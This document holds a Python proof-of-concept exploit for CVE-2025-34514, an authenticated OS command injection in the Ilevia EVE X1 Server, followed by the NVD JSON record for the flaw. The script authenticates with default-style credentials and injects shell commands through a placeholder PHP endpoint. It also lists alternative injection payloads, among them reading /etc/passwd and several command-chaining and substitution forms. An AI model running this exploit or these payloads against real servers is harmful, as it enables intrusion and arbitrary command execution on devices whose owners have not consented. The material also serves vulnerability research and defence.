CVE-2025-34514

# CVE-2025-34514 - Ilevia EVE X1 Server Authenticated OS Command Injection PoC # Author: VulnCheck Research / Zero Science Lab (ZSL-2025-5966) # Description: Exploits command injection in PHP scripts calling exec() import requests import sys TARGET = "http://target-ip:8080" USERNAME = "admin" PASSWORD = "password" # Step 1: Authenticate to obtain session session = requests.Session() login_url = f"{TARGET}/login.php" login_data = { "username": USERNAME, "password": PASSWORD } response = session.post(login_url, data=login_data) if response.status_code != 200: print("[-] Authentication failed") sys.exit(1) print("[+] Authenticated successfully") # Step 2: Exploit command injection in vulnerable PHP endpoint # The vulnerable script calls exec() with unsanitized user input vulnerable_endpoint = f"{TARGET}/some_vulnerable_script.php" # Inject OS command using semicolon separator # Replace 'id' with any command to execute injected_command = "; id" params = { "param": injected_command } response = session.get(vulnerable_endpoint, params=params) print(f"[+] Command output:\n{response.text}") # Alternative payloads using different injection techniques: # Payload 1: Command chaining with semicolon # param=; cat /etc/passwd # # Payload 2: Command substitution with backticks # param=`whoami` # # Payload 3: Command substitution with $() # param=$(whoami) # # Payload 4: Pipe operator # param=| whoami # # Payload 5: Logical AND operator # param=&& whoami # # Payload 6: Logical OR operator # param=|| whoami

{"cve": {"id": "CVE-2025-34514", "sourceIdentifier": "[email protected]", "published": "2025-10-16T18:15:35.760", "lastModified": "2025-11-25T17:15:49.900", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ilevia EVE X1 Server firmware versions ≤ 4.7.18.0.eden contain authenticated OS command injection vulnerabilities in multiple web-accessible PHP scripts that call exec() and allow an authenticated attacker to execute arbitrary commands. Ilevia has declined to service this vulnerability, and recommends that customers not expose port 8080 to the internet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:ilevia:eve_x1_server_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.7.18.0", "matchCriteriaId": "25D89BA5-1632-4243-BE68-D42803774A22"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:ilevia:eve_x1_server:-:*:*:*:*:*:*:*", "matchCriteriaId": "72B4F8B5-4641-4371-8759-3AB18EC87FB6"}]}]}], "references": [{"url": "https://www.ilevia.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/ilevia-eve-x1-server-auth-command-injection", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5966.php", "source": "[email protected]"}]}}